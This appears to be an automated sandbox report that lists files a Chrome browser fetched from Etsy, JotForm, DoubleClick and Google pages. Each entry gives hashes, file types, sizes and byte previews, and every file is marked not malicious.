                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:39724EE1FC2FBAFAD08625DEBF430D5A
                                                                                                                                                                              SHA1:39286CCA8AB8A87548D5052CD92499056545ACD4
                                                                                                                                                                              SHA-256:FAC1628A33E5B69217F8E9E4CBC5D34D9D6F24785FFA9400BCEDEBFFBB94DC60
                                                                                                                                                                              SHA-512:6BFC52A373CB3F7799DD8AF8F7DF2982B00586480A2D8C523F340004788449CC3E96ECB489107CF74399D0E255454A8BB82D08BD22F2FABFC78927A9730E6C9E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/37150599/r/il/0d1f51/5425350439/il_600x600.5425350439_pbmd.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................dn...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................dvmdat.....&ey_.....2........1@............C...5.a1.....p....T-.|;.3...d........;.G....X=.z.w../....P.......n...M....!.<"o.7.x......T..6+,..*....r.......Tl_.i......~0,|b.b....7.g5V..\.I...y.T.Jhs.rM..lEM...iK.._...qZ..;..O4V....j....h6o.........>7....lq...$v.I...~@JY.....7.1.Z..f.(...M.v..C....*...!.f..#.O.. .X.o!..UR(:....d..u..!..V...3.KP;F......~!1)....h..~...A..V`.r...!.......KP=..F.z..^x...r.4L..q.p.(d......N..6.MM.......~C5J@....(.c.(..Q.Y...hC.N4..^.:..}.uyv.:.."......pN.....O.h.....q....`C...[.4.....{..1p.4i..P..Fr_p.^.D..1.|..|....LWn.....J7..y..T'P.'.u.v.._.9.3.+e.:.T*.'.7.=w..}QM~G.WT.Xa..4@o3G.....y<c....w....>/.l.N.j.IJ.e;V.k;.|D.yj..p O..K..".x..v.m........=V....d...w@.._L....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):43280
                                                                                                                                                                              Entropy (8bit):7.957785426819797
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:151F4525980BA351D06D13BAE40C479A
                                                                                                                                                                              SHA1:3D6127C63031F78178A9A8E9C0D89A34E4C651E4
                                                                                                                                                                              SHA-256:83A350E637ADDCB0461A143988061C2FE4E884791436DC15058FC6F11A35BF81
                                                                                                                                                                              SHA-512:62919362B8E76191DF9F0F626A8541E48E723009F397484B3CA94D464574984F643FCFCC9CEEB5A9E4A85ACBD552D9FC5B1AF87D55BF9F41C6E6E829DB8575D5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................J..........................!1A..Qa"q..#2B..Rb...Cr...$3S.4s....5c.....Dt..................................C.......................!..1A."Qa.q..2....#Bb.3Rr..........$4CS...............?....U..EG<.n'tR:4Y.5.)0.';..g..8+...d.`..J..M.\a.He.......xQ.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3968)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5056
                                                                                                                                                                              Entropy (8bit):5.432838470939945
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FBAA5350EA1E35997F589FC49947ACCC
                                                                                                                                                                              SHA1:FC9253EC0B5DEA916B9255FB0445E99C733164C8
                                                                                                                                                                              SHA-256:49176B244DE4B07D2A8A79CD8663A2FCED053ACC22B1807929521665D09F3E3A
                                                                                                                                                                              SHA-512:C84DBA63EF055137CE0FD9212E33BDD76F7A747DD01BB24FB319C67F63CB9C2930820066BCE802499828F897CA967D1311D9403F03CD02D55F2B6BC3B321F66B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn01.jotfor.ms/js/vendor/smoothscroll.min.js?v=3.3.57813
                                                                                                                                                                              Preview:/**.The MIT License (MIT)..Copyright (c) 2013 Dustan Kasten..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (11390), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):11390
                                                                                                                                                                              Entropy (8bit):5.560962168514552
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3CFCCE664B4F5B4D9FCD3223F3916EBE
                                                                                                                                                                              SHA1:F32C59F5BCF151892D5C5C761FEFB3E5C73813DC
                                                                                                                                                                              SHA-256:2EEDC9415E88E998EAD327E82A083B0674B3B892E6DC4086B841486FA8CA2D81
                                                                                                                                                                              SHA-512:9AAFE281E11320098897AC6405BC32896D519DFD2810064E8890491E8A8480908685AC72A3EB24F2BA215926D797EE91CB84E1350836BA3AC9E0F2C6EF0CF3B4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/995917074?random=1729505279991&cv=11&fst=1729505279991&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fv2nt.molouscre.com%2F&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D%3Becomm_pagetype%3Dhome%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
                                                                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s2084024919.1729505276","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s2084024919.1729505276\u0026ig_key=1sNHMyMDg0MDI0OTE5LjE3Mjk1MDUyNzY!2sad4SAg!3sAAptDV7ir_fz\u0026tag_eid=44801598","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sZQASTg!2sad4SAg!3sAAptDV7ir_fz"],"userBiddingSignals":[["8023594364"],null,1729505282341310],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=16623847170
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                              Entropy (8bit):5.066549143992613
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9164C27FF39E2D48F276A1BF8F947ECC
                                                                                                                                                                              SHA1:8BBCB9DA18FAE2DE5A1574FB364EF76739C57DEC
                                                                                                                                                                              SHA-256:514D63E7D96E77327F6DE49E26E76AF1AE65067919AF490B90A653657E50B80C
                                                                                                                                                                              SHA-512:9CE206330BCDC5B1213FC7936807060E0DB6407D169935B2CB893D142B4169B3EEB9C33F1747F231D4E7DA8FA4F37A1E93CF2C3BD8EE59A1FB4952B999CC994E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(()=>{"use strict"})();.//# sourceMappingURL=https://www.etsy.com/sourcemaps/evergreenVendor/en-US/react-csr/dummy-entrypoint.0ef7f42fe0e84744d774.js.map
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):8992
                                                                                                                                                                              Entropy (8bit):7.9541188781551035
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9E46ED4F409D7D184EF91627C278CA39
                                                                                                                                                                              SHA1:F75A820CFB7E72DA029329E44A9E32C062085209
                                                                                                                                                                              SHA-256:38C910805E666C3ABB0000CED814A7BDBF0D5638B2C129955E813D0D16CB61FA
                                                                                                                                                                              SHA-512:2EDE50038E25E7F8C670852967AB0928E8CF211E9D19B9F0E400E44DE45075D5787980F760F84540201C46E57BB675F1F80EC050B1A43590EBC52A1033FC16F8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/53760967/r/il/ac79e0/6312835192/il_340x270.6312835192_home.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.................."....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................".mdat....."*p...h4 2.D.p.E.Q@...i[..t...m.i.l.(dR.....fh;............O..,.S:..I.._.9.'./d.Cx;...He......)....j>....zrTMz.No.U..........r./.1kf3..q/_QK..F]Z.\.\l...|ST..,.)....y^d....9+..Mc.....>..|Fh0.!.W..,...r.J.i3q...]..E>...U.y..R..F;w.K....v.d~=.W......../....A......zv.w.>..M......V0.z..........;...|..}..@..E..L.......Lgw.P.s.FT@C.:.DU._......!..S.c..G....1..'5..WsX.q<.:.o..2_. .....'.}E....~....@...59.- ... .>....G6....n....L...v.D.........W...MS$Py.2.q(."a$....B....|.]....+,4..h..pA.x*....M....l.......f.=..r.M7.....l.... 0u..px....3l._...l..OS.|H.....k.J6...A.. *....~..lQ8,.,..\....&....S.#}..!Y..2...pT.|.)...5..->.....D.K..T....+...nd%Q\.E#..+`f...(0../.[[.6.....3%....2....cs..)..[..'.5c
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6417
                                                                                                                                                                              Entropy (8bit):4.728794319759142
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:27F180956774D0ED52C65CEA8E0D4F09
                                                                                                                                                                              SHA1:1DB68F34D1D0279D1364261A1DF7790DE6439110
                                                                                                                                                                              SHA-256:B4686D1F9905BA4CA42EB7B9E8E595D8CF6E9823EE3079E38791884626365730
                                                                                                                                                                              SHA-512:146821D17E0E2E2DDC087DD2A21FFA6B578A2DA254AAD681B070D215F498322FEC7362FCE073697C9B3CDAD1A9A1482F07BA009AAA94B5328940751D05D54D28
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(global, factory) {. if (window.FORM_MODE === 'cardform') return;. typeof exports === "object" && typeof module !== "undefined". ? (module.exports = factory()). : typeof define === "function" && define.amd. ? define(factory). : ((global = global || self), (global.ErrorNavigation = factory()));.})(this, function() { 'use strict';. var state = {. section: null,. current: -1,. errors: [],. scrollToBottomOnClose: true,. };. . function getMessage() {. if (state.errors.length <= 0) {. return JotForm.texts.doneMessage;. }.. var msg="";. if (state.errors.length === 1) {. msg = JotForm.texts.oneError;. }. else{. msg = JotForm.texts.multipleError;. }.. msg = msg.replace('{count}', '<strong>' + state.errors.length + '</strong>');. return msg;. }.. function createNavigation(section) {. var container = document.createElement('div');. container.classList.add('error-navigation-container');. container.style.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28984, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):28984
                                                                                                                                                                              Entropy (8bit):7.992286842921466
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F149CEAB7560DEBBE2262F7A567DA9E6
                                                                                                                                                                              SHA1:033A44629A2FE9B17315CBD4749B535A2E45282B
                                                                                                                                                                              SHA-256:4D2211D9F08037952856712E33C2EA7B5295567C93734B6802AFAF08936935AD
                                                                                                                                                                              SHA-512:CF42673F56230093AA3BF1F1BDBC0B1A927649EE3398493B21CDA021EBF010226FBD119A6FC90948602D9EEFB6CF62DC3EA1FA9B80E2C676B85F64A1164E6555
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/assets/type/Graphik-Regular-Web.woff2
                                                                                                                                                                              Preview:wOF2......q8......k...p.................................`..B.H..s.....X..o..V...4.6.$..(. ..c. ..x[(Nq..}....`...-^?;P...{7w-.n.Dz......d....Ic..... ~.Z..Dl3'j..!.j...sVT..:.-........nl...8v,..CEmusL......6.c.tH.._...,SLi**~^.;.;3.P.q.8...Bl....l.r..&0U...C,.....*....En.*...I....*M1.H..Y.&=.C._~N. ...^,.k.....>b.2.S|...\...aW......g...|....CD.N......Nr......6...=..`p.Z1000j.L....r........usU....O.`-.Ig~oP0#i$...+.w7...T..V.}r..TH......'..QAc....\..!..p5...1....6..9...1>P...9..:/.....:...r.Qk(.j...UTh.B...e..].C..E...x<{..kkA@<3.T.......j..o.L.d}5/.B]......CO....z....x...b..g.$....vA.....=..jpo...4.P...J....[.-n.`lD*...X.h.o....~..a....(3W.3.'.Y.....q.=.J%R.T*.Hddd$..<D..1.[1....T.......j..."1.~.`._..M]g?..,...@..S8.Tn.R..x2..I.._3.....of...l.`../iF...Ur.v.u.V....~...Jv/.o....b...H....x|....>.S)=.H...pjN..af...*.I3]...K...4.yZ....:..&.M....Pv.+..7...._...j...d...k./....X....L...r..a.L=Q..]..dl........Y..U..r-.....>_...Y...K.i..x....."{0.......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):28
                                                                                                                                                                              Entropy (8bit):4.208966082694623
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:818FC7D875514FC700862FBA233FC191
                                                                                                                                                                              SHA1:CB02BF170290534FE3E0334902CA8321781D47DB
                                                                                                                                                                              SHA-256:144D459A624DC0AB6803112862D09550D12150355A51296D908EF0944CADF837
                                                                                                                                                                              SHA-512:FAC2391809BFEBBB1DF4714AD3DBD83438F1CABBA0ECC9316DD17572BCB80744FD862685C951E0C362FD2111124DC3B8395A6F7617A6F18158F5BAD33B50C695
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwl4hqyDSpV6xxIFDZKYbpgSBQ01nD9C?alt=proto
                                                                                                                                                                              Preview:ChIKBw2SmG6YGgAKBw01nD9CGgA=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):80220
                                                                                                                                                                              Entropy (8bit):7.969793133625501
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3D702EC8AD6A49C62F5025F578A6B5EA
                                                                                                                                                                              SHA1:22F324F31B277A5466118F4C83F0921B9AE8139E
                                                                                                                                                                              SHA-256:90E7732DA144CC25218ABD206FA125F74576131ADF0433A55FD2E225B2856DB6
                                                                                                                                                                              SHA-512:BBC8DA439F446F7C1158619CDF353D084B11477B8DC9EA9A6DCC660C5EF8850454C4B2B5F720C6CA27D2D75B96D354F9E4699F52FD6D2634F5D19F84DE5A24D5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................E.........................!.1A."Qaq..2..#B.R...$3b......%Cr.DS.5.c..................................5......................!1..AQa."q....2B..#b..3r...$R............?.....5..J.O..X.q.X|}jgLq*."..L+n......?....`..[....|..m.G..m.....7f"..d'|....W..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):45252
                                                                                                                                                                              Entropy (8bit):7.96962072947079
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:090E38F7077F3DA10AD74769E117F1D8
                                                                                                                                                                              SHA1:501BAA48E324D1D7F8C7703E645C7DC78292A93A
                                                                                                                                                                              SHA-256:91CBC52A49BA1B40201C56664E13A57C42B9994550F19FDFD47C83533FF5799A
                                                                                                                                                                              SHA-512:828D3E365A44273561814FC7BF858BE04A72EC287CB9A432C0253BD4C0ED11D33A6F3835C7BD88153363F4B9F1DDD0ABB05443B4285650748F29C628ACBD4CA4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................D........................!..1AQ.a."q..2..#BR..b....$3rC....%S.c....................................:........................!1AQ..a"q.2..B..#R....r.b..$3Cc.............?.....Q..|...... .O^.\.P...0..hn.u.m.k.5(.nXr..E..dQ.........i0..-.* &.M.. ..e
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):37163
                                                                                                                                                                              Entropy (8bit):7.9508370841040765
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4824DC61B0772A5F3C992F6B20C9225B
                                                                                                                                                                              SHA1:37FC9C973705E5944B297322C02DBCE6C8084C1E
                                                                                                                                                                              SHA-256:636CE9AE5B23950A02DD8870C70C8BF96FED3F10D5A6664FAF908A0AAC6E05A1
                                                                                                                                                                              SHA-512:B87AF6050A446172BDB0C5236AF4890D29CC4146A7B5000944125A80E26E4B36E424B4D3188EE5C3D7D48162184B6FEFEB24353F6A4B2CD96B7C5A62D13B0513
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......,.,..".........................................=.........................!.1."AQ..2aq#B...R...$3Cb...r...S.................................C.........................!1.."AQa2q...#B..b..$Rr.....%3s45Ccd................?...4..,F.#^h.W.CZ.B1.1..i5.t..4.u.u...j.T.4V....I.4.p.Y...8...VkX.?.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):142312
                                                                                                                                                                              Entropy (8bit):7.969747469535489
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A04249789007CB3C8AD0C52FB92B48EA
                                                                                                                                                                              SHA1:CB9FF5170C00C862661788CE3C7C570C43E3DDDE
                                                                                                                                                                              SHA-256:AE1194C394FEC8B43DAE88E05DC67055FEF2066029E0D3C3794A798DCB34E457
                                                                                                                                                                              SHA-512:D3C751643CC1F0A5DA19DD075997399AB4DFD3838FD1FA95B67EAD111DD521846205A6BF3F111BC8EFC4861116395BDE07D5C0DF2D0C274036C2540F9FCB7E58
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................J.........................!1..A"Qa.q.2...#B.$R..3b...r...%4C....&5DSc.T...................................;......................!..1A.Qaq."..2B.....#.Rb...3r.$C...............?.g.y../I..F.s..u..$......3....A.,......$zc..M...|g9}D...4....+..U.b..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3141)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):231922
                                                                                                                                                                              Entropy (8bit):5.5477791606729765
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0FDF806CCC5EE189F7876260BF65E494
                                                                                                                                                                              SHA1:4905AAA2C058254121993C7E335E8369F8EE491B
                                                                                                                                                                              SHA-256:2FECB9F8E99E025A8175C824A214E465A8FF9F110640DFDC5CC3B22765231238
                                                                                                                                                                              SHA-512:815BE1D60BC0D01E6575367F44891638AE9AE278C1D3060374849C48EE74FA908C69ED6B9254CD54815BFEFA6DC5187A8005E3A9E68D16244FFA5632DA8B946F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://accounts.google.com/gsi/client
                                                                                                                                                                              Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2e244000, 0x660, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):85599
                                                                                                                                                                              Entropy (8bit):5.0629220259477234
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B734871FFF645289A836C4CD4C74D8E2
                                                                                                                                                                              SHA1:47AE1E4B64483801AB7B35DEB444E0B66D039CA7
                                                                                                                                                                              SHA-256:DE5FF3A6BC755CB6A9D2B445DEC6955A683EFB6BD94DF0F1D104CC3915B1103C
                                                                                                                                                                              SHA-512:ACD8C880A711C619259320D83B52B21676DBCF7AB0E0004A152D80609403EAF41D93A3C72DC2841418CFD125315E9DE9B10985321B1E44FF92C5FB0203763744
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:"https://www.etsy.com/dac/vesta_homepage/vesta_homepage.00d19f16e05ad5,vesta_homepage/consistent_spacing.74cb1c37c4995e,homepage/_modules/spacing.74cb1c37c4995e,vesta_homepage/view/etsy-everyday.706dbffffca1c9,vesta_homepage/view/daily-deals.74cb1c37c4995e,homepage/_modules/complex-grid.74cb1c37c4995e,homepage/_modules/editors-picks.2a0819fd7691a6,neu/modules/listing_card.00d19f16e05ad5,neu/modules/favorite_button_defaults.74cb1c37c4995e,listings/listing-card-video.74cb1c37c4995e,web-toolkit-v2/modules/video/video_previews.74cb1c37c4995e,common/listing_card_text_badge.b1c6bd381ce780,home_living/shop-the-look.74cb1c37c4995e,homepage/_modules/common/simple-header.74cb1c37c4995e,vesta_homepage/view/what-is-etsy.74cb1c37c4995e,impact/homepage/what-is-etsy/community-impact.74cb1c37c4995e,pages/join_neu/social/google_one_tap_modal.2ec02d4eb6d23b.css?variant=sasquatch"
                                                                                                                                                                              Preview:.ui-toolkit #content{overflow:hidden}.ui-toolkit .body-max-width{max-width:1402px}@media only screen and (min-width:0) and (max-width:639px){.inline-review-nudger-justify-self{justify-content:center}}.vesta-hp-full-width-banner{width:100vw;position:relative;left:50%;transform:translate(-50%)}@media only screen and (min-width:640px){.expired-review-alert{max-width:100%!important;margin-left:1%!important;margin-right:1%!important}}#error-panel{text-align:left;background-color:#ffe;border:1px solid #cfcf9c;border-radius:10px;max-width:980px;margin:20px auto;font-family:menlo,courier new,monospace;position:relative;box-shadow:0 1px 1px #0000001a}#error-panel .inner{box-sizing:border-box;max-width:90%;max-height:400px;margin:20px;overflow:auto}#error-panel .header-row{margin:20px}#error-panel h1{float:none;background-size:100px;margin-bottom:1em;padding:25px 0 15px;display:none}#error-panel-js-errors,#error-panel-server-errors{display:none}#error-panel table.summary{border-spacing:0 10px;bo
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):38091
